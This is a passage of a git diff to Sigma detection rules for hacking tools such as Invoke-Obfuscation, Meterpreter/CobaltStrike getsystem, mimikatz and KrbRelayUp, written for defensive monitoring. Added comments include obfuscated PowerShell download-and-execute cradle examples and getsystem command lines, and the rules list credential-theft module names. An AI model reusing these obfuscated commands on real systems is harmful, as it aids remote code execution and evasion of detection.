\"{5}{1}{2}{4}{3}{0}\" -f 'n',( \"{1}{0}\"-f'KE-','o' ),(\"{2}{1}{0}\"-f 'pRESS','x','e' ),'o','i','iNV') ; [System.Windows.Forms.Clipboard]::(\"{0}{1}\" -f( \"{1}{0}\"-f'e','SetT' ),'xt').\"InV`oKe\"( ' ')" + # Example 2: CMD/c " ECho Invoke-Expression (New-Object Net.WebClient).DownloadString|c:\WiNDowS\SySteM32\cLip && powershElL -noPRO -sTa ^& (\"{2}{0}{1}\" -f 'dd',(\"{1}{0}\"-f 'ype','-T' ),'A' ) -AssemblyN (\"{0}{3}{2}{1}{4}\"-f'Pr','nCo',(\"{0}{1}\"-f'e','ntatio'),'es','re' ) ; ^& ( ( [StRinG]${ve`RB`OSE`pr`e`FeReNCE} )[1,3] + 'x'-JoiN'') ( ( [sySTem.WInDOWs.ClipbOaRD]::( \"{1}{0}\" -f(\"{0}{1}\" -f'tTe','xt' ),'ge' ).\"IN`Vo`Ke\"( ) ) ) ; [System.Windows.Clipboard]::( \"{2}{1}{0}\" -f't',( \"{0}{1}\" -f 'tT','ex' ),'Se' ).\"In`V`oKe\"( ' ' )" + CommandLine|contains|all: - cmd - '&&' - 'clipboard]::' - -f - CommandLine|contains: + CommandLine|contains: - /c - /r condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml index b1203b0a9..9f87f2543 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml @@ -1,8 +1,7 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation id: 4bf943c6-5146-4273-98dd-e958fd1e3abf status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the following code block +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -22,13 +21,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - CommandLine|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - CommandLine|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - CommandLine|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - CommandLine|re: \*mdr\*\W\s*\)\.Name - - CommandLine|re: \$VerbosePreference\.ToString\( - - CommandLine|re: \[String\]\s*\$VerbosePreference + - CommandLine|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - CommandLine|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - CommandLine|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - CommandLine|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - CommandLine|re: \*mdr\*\W\s*\)\.Name + - CommandLine|re: \$VerbosePreference\.ToString\( + - CommandLine|re: \[String\]\s*\$VerbosePreference condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml index 8817b6ba9..d6ece1745 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml @@ -3,7 +3,7 @@ id: 6c96fc76-0eb1-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of stdin to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/17 @@ -21,17 +21,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main: - CommandLine|contains|all: + # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + # Example 1: c:\windows\sYstEm32\CmD.eXE /C"echO\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -" + # Example 2: c:\WiNDOws\sysTEm32\cmd.EXe /C " ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )" + CommandLine|contains|all: - cmd - powershell - CommandLine|contains: + CommandLine|contains: - /c - /r selection_other: - - CommandLine|contains: noexit - - CommandLine|contains|all: - - input - - $ + - CommandLine|contains: noexit + - CommandLine|contains|all: + - input + - $ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml index 7200d5b17..e6ae9b449 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml @@ -3,7 +3,7 @@ id: 27aec9c9-dbb0-4939-8422-1742242471d0 status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/17 @@ -21,11 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + # Example 1: C:\winDoWs\SySTeM32\cmd.Exe /C"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\"{2}{3}{0}{1}\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\"IN`VO`KecOmMaND\".\"inVo`KES`crIPt\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\"{1}{4}{2}{3}{0}\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \"{0}{1}\"-f'n','oti' ),( \"{0}{1}\" -f'pRoC','esS') )) )" + # Example 2: cMD.exe /C "seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\"{1}{0}{2}{3}\" -f 'eT-vaR','G','iab','lE' ) (\"{0}{1}\" -f '*m','DR*' ) ).\"na`ME\"[3,11,2]-JOIN'' ) ( ( ^&(\"{0}{1}\" -f'g','CI' ) (\"{0}{1}\" -f 'ENV',':SlDb' ) ).\"VA`luE\" ) " + CommandLine|contains|all: - cmd - '"set' - -f - CommandLine|contains: + CommandLine|contains: - /c - /r condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml index 30aa40f03..451956d47 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml @@ -3,7 +3,7 @@ id: 7eedcc9d-9fdb-4d94-9c54-474e8affc0c7 status: test description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/12/29 @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - new-object - text.encoding]::ascii - CommandLine|contains: + CommandLine|contains: - system.io.compression.deflatestream - system.io.streamreader - readtoend( diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml index fb6140d53..a069dd987 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml @@ -3,7 +3,7 @@ id: 9c14c9fa-1a63-4a64-8e57-d19280559490 status: test description: Detects Obfuscated Powershell via Stdin in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28) author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2022/11/16 @@ -21,10 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + # CommandLine|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + CommandLine|contains|all: - set - '&&' - CommandLine|contains: + CommandLine|contains: - environment - invoke - input diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml index 1508ebe40..7372e0b93 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml @@ -3,7 +3,7 @@ id: e1561947-b4e3-4a74-9bdd-83baed21bdb5 status: test description: Detects Obfuscated Powershell via use Clip.exe in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/16 @@ -21,11 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + # CommandLine|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + # Example 1: C:\WINdoWS\sySteM32\CMd /c " ECho\Invoke-Expression (New-Object Net.WebClient).DownloadString|Clip.Exe&&C:\WINdoWS\sySteM32\CMd /c pOWerSheLl -STa . ( \"{2}{0}{1}\"-f'dd-',(\"{0}{1}\" -f 'T','ype' ),'A' ) -Assembly ( \"{4}{1}{3}{0}{2}\"-f (\"{0}{1}\" -f 'nd','ow'),( \"{1}{0}\"-f'.W','stem' ),( \"{2}{1}{0}\" -f 'rms','Fo','s.'),'i','Sy') ; ${exeCUtIOnCONTeXT}.\"INV`oKECOM`m`ANd\".\"INV`ok`ESCriPT\"( ( [sYSteM.wiNDoWS.forMs.ClIPboaRD]::( \"{2}{0}{1}\" -f'Ex','t',(\"{0}{1}\" -f'Get','t' ) ).\"iNvo`Ke\"( )) ) ; [System.Windows.Forms.Clipboard]::(\"{1}{0}\" -f 'ar','Cle' ).\"in`V`oKE\"( )" + # Example 2: C:\WINDowS\sYsTEM32\CmD.eXE /C" echo\Invoke-Expression (New-Object Net.WebClient).DownloadString| C:\WIndOWs\SYSteM32\CLip &&C:\WINDowS\sYsTEM32\CmD.eXE /C POWERSHeLL -sT -noL [Void][System.Reflection.Assembly]::( \"{0}{3}{4}{1}{2}\" -f( \"{0}{1}\"-f'Lo','adW' ),( \"{0}{1}\"-f 'Par','t'),( \"{0}{1}{2}\"-f 'ial','N','ame'),'it','h' ).\"in`VO`KE\"( ( \"{3}{1}{4}{5}{2}{0}\"-f'rms','ystem.Windo','Fo','S','w','s.' )) ; ( [wIndows.fOrms.cLIPBOArD]::( \"{1}{0}\"-f'T',( \"{1}{0}\" -f'tEX','gET' )).\"i`Nvoke\"( ) ) ^^^| ^^^& ( ( ^^^& ( \"{2}{1}{0}\"-f 'e',( \"{2}{1}{0}\"-f'IABl','aR','v' ),( \"{0}{1}\"-f'Get','-' ) ) ( \"{1}{0}\"-f'*','*MDr' )).\"n`Ame\"[3,11,2]-jOin'') ; [Windows.Forms.Clipboard]::( \"{0}{1}\" -f (\"{1}{0}\"-f'tT','Se' ),'ext').\"in`VoKe\"(' ' )" + CommandLine|contains|all: - echo - clip - '&&' - CommandLine|contains: + CommandLine|contains: - clipboard - invoke - i` diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml index 6e90c6df5..148ea3093 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml @@ -3,7 +3,7 @@ id: ac20ae82-8758-4f38-958e-b44a3140ca88 status: test description: Detects Obfuscated Powershell via use MSHTA in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31) author: Nikita Nazarov, oscd.community date: 2020/10/08 modified: 2022/03/08 @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - set - '&&' - mshta diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml index 1a65eff0c..0e67289e3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml @@ -3,7 +3,7 @@ id: e9f55347-2928-4c06-88e5-1a7f8169942e status: test description: Detects Obfuscated Powershell via VAR++ LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27) author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2022/11/16 @@ -21,12 +21,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + # CommandLine|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + # Example 1: CMD /C"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\wINDowS\sYsWow64\winDOWspoWERSheLl\V1.0\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\"invo`kEcoMm`A`ND\".( \"{2}{1}{0}\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \"{0}{1}\" -f'D','IR' ) ( \"{0}{1}\"-f'ENV:kU','R')).\"vAl`Ue\" )&& CMD /C%mXI%" + # Example 2: c:\WiNDOWS\sYSTEm32\CmD.exE /C "sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\"{2}{0}{1}\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \"{2}{3}{0}{1}\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \"{2}{5}{0}{1}{6}{4}{3}\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \"{0}{1}\"-f'd','ejLz' ),( \"{1}{2}{0}\"-f'cEss','P','RO') )) )&& c:\WiNDOWS\sYSTEm32\CmD.exE /C %ybkm%" + CommandLine|contains|all: - '&&set' - cmd - /c - -f - CommandLine|contains: + CommandLine|contains: - '{0}' - '{1}' - '{2}' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml index 5b099f42c..89e47bd7d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml @@ -24,17 +24,17 @@ detection: ParentCommandLine|endswith: .bat selection1: Image|endswith: \xcopy.exe - CommandLine|contains|all: + CommandLine|contains|all: - powershell.exe - .bat.exe selection2: Image|endswith: \xcopy.exe - CommandLine|contains|all: + CommandLine|contains|all: - pwsh.exe - .bat.exe selection3: Image|endswith: \attrib.exe - CommandLine|contains|all: + CommandLine|contains|all: - +s - +h - .bat.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_koadic.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_koadic.yml index 5153b45a4..a7b2810ff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_koadic.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_koadic.yml @@ -23,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /q - /c - chcp diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml index 8da74de3c..aa7ecc79d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml @@ -19,20 +19,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \KrbRelay.exe - - OriginalFileName: KrbRelay.exe + - Image|endswith: \KrbRelay.exe + - OriginalFileName: KrbRelay.exe # In case the file has been renamed after compilation selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -spn ' - ' -clsid ' - ' -rbcd ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - shadowcred - clsid - spn selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - 'spn ' - 'session ' - 'clsid ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml index b6a434f8d..2eb4c0b84 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml @@ -1,8 +1,7 @@ title: HackTool - KrbRelayUp Execution id: 12827a56-61a4-476a-a9cb-f3068f191073 status: test -description: Detects KrbRelayUp used to perform a universal no-fix local privilege - escalation in Windows domain environments where LDAP signing is not enforced +description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced references: - https://github.com/Dec0ne/KrbRelayUp author: Florian Roth (Nextron Systems) @@ -22,19 +21,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \KrbRelayUp.exe - - OriginalFileName: KrbRelayUp.exe + - Image|endswith: \KrbRelayUp.exe + - OriginalFileName: KrbRelayUp.exe # In case the file has been renamed after compilation selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' relay ' - ' -Domain ' - ' -ComputerName ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' krbscm ' - ' -sc ' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' spawn ' - ' -d ' - ' -cn ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml index 02ac8ed34..4fa0a620c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml @@ -1,8 +1,7 @@ title: HackTool - LocalPotato Execution id: 6bd75993-9888-4f91-9404-e1e4e4e34b77 status: test -description: Detects the execution of the LocalPotato POC based on basic PE metadata - information and default CLI examples +description: Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples references: - https://www.localpotato.com/localpotato_html/LocalPotato.html - https://github.com/decoder-it/LocalPotato @@ -23,7 +22,7 @@ detection: selection_img: Image|endswith: \LocalPotato.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - .exe -i C:\ - -o Windows\ selection_hash_plain: diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml index 0954a0794..b0a1b0b05 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml @@ -1,8 +1,7 @@ title: Potential Meterpreter/CobaltStrike Activity id: 15619216-e993-4721-b590-4c520615a67d status: test -description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting - a specific service starting +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ @@ -24,22 +23,26 @@ detection: selection_img: ParentImage|endswith: \services.exe selection_technique_1: - CommandLine|contains|all: + # Examples: + # Meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + # CobaltStrike getsystem technique 1b (expanded env var): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + # CobaltStrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + CommandLine|contains|all: - /c - echo - \pipe\ - CommandLine|contains: + CommandLine|contains: - cmd - '%COMSPEC%' selection_technique_2: - CommandLine|contains|all: + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + CommandLine|contains|all: - rundll32 - .dll,a - '/p:' filter_defender: - CommandLine|contains: MpCmdRun - condition: process_creation and (selection_img and 1 of selection_technique_* - and not 1 of filter_*) + CommandLine|contains: MpCmdRun + condition: process_creation and (selection_img and 1 of selection_technique_* and not 1 of filter_*) fields: - ComputerName - User diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml index 363b63ff3..15ed3baed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml @@ -5,8 +5,7 @@ description: Detection well-known mimikatz command line arguments references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://tools.thehacker.recipes/mimikatz/modules -author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim - Shelton +author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton date: 2019/10/22 modified: 2023/02/21 tags: @@ -25,24 +24,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_tools_name: - CommandLine|contains: + CommandLine|contains: - DumpCreds - mimikatz - selection_function_names: - CommandLine|contains: - - ::aadcookie - - ::detours - - ::memssp - - ::mflt - - ::ncroutemon - - ::ngcsign - - ::printnightmare - - ::skeleton - - ::preshutdown - - ::mstsc - - ::multirdp + selection_function_names: # To cover functions from modules that are not in module_names + CommandLine|contains: + - ::aadcookie # misc module + - ::detours # misc module + - ::memssp # misc module + - ::mflt # misc module + - ::ncroutemon # misc module + - ::ngcsign # misc module + - ::printnightmare # misc module + - ::skeleton # misc module + - ::preshutdown # service module + - ::mstsc # ts module + - ::multirdp # ts module selection_module_names: - CommandLine|contains: + CommandLine|contains: - 'rpc::' - 'token::' - 'crypto::' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml index b1a339343..081824c71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml @@ -1,8 +1,7 @@ title: HackTool - PCHunter Execution id: fca949cc-79ca-446e-8064-01aa7e52ece5 status: test -description: Detects suspicious use of PCHunter, a tool like Process Hacker to view - and manipulate processes, kernel options and other low level stuff +description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff references: - http://www.xuetr.com/ - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ @@ -31,8 +30,8 @@ detection: - \PCHunter64.exe - \PCHunter32.exe selection_pe: - - OriginalFileName: PCHunter.exe - - Description: Epoolsoft Windows Information View Tools + - OriginalFileName: PCHunter.exe + - Description: Epoolsoft Windows Information View Tools selection_hashes: Hashes|contains: - SHA1=5F1CBC3D99558307BC1250D084FA968521482025 @@ -44,18 +43,18 @@ detection: - SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C - IMPHASH=0479F44DF47CFA2EF1CCC4416A538663 selection_hash_values: - - md5: - - 228dd0c2e6287547e26ffbd973a40f14 - - 987b65cd9b9f4e9a1afd8f8b48cf64a7 - - sha1: - - 5f1cbc3d99558307bc1250d084fa968521482025 - - 3fb89787cb97d902780da080545584d97fb1c2eb - - sha256: - - 2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32 - - 55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c - - Imphash: - - 444d210cea1ff8112f256a4997eed7ff - - 0479f44df47cfa2ef1ccc4416a538663 + - md5: + - 228dd0c2e6287547e26ffbd973a40f14 + - 987b65cd9b9f4e9a1afd8f8b48cf64a7 + - sha1: + - 5f1cbc3d99558307bc1250d084fa968521482025 + - 3fb89787cb97d902780da080545584d97fb1c2eb + - sha256: + - 2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32 + - 55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c + - Imphash: + - 444d210cea1ff8112f256a4997eed7ff + - 0479f44df47cfa2ef1ccc4416a538663 condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml index 51d0c89c9..444d72502 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml @@ -31,11 +31,11 @@ detection: - \powershell.exe - \pwsh.exe Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /Create - powershell.exe -NonI - /TN Updater /TR - CommandLine|contains: + CommandLine|contains: - /SC ONLOGON - /SC DAILY /ST - /SC ONIDLE diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_powertool.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_powertool.yml index 2e0089a41..5fca7216b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_powertool.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_powertool.yml @@ -1,9 +1,7 @@ title: HackTool - PowerTool Execution id: a34f79a3-8e5f-4cc3-b765-de00695452c2 status: test -description: Detects the execution of the tool PowerTool which has the ability to - kill a process, delete its process file, unload drivers, and delete the driver - files +description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ - https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html @@ -24,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \PowerTool.exe - - \PowerTool64.exe - - OriginalFileName: PowerTool.exe + - Image|endswith: + - \PowerTool.exe + - \PowerTool64.exe + - OriginalFileName: PowerTool.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml index a7eaf4ffd..326e93e55 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \purplesharp - - OriginalFileName: PurpleSharp.exe + - Image|contains: \purplesharp + - OriginalFileName: PurpleSharp.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - xyz123456.exe - PurpleSharp condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml index 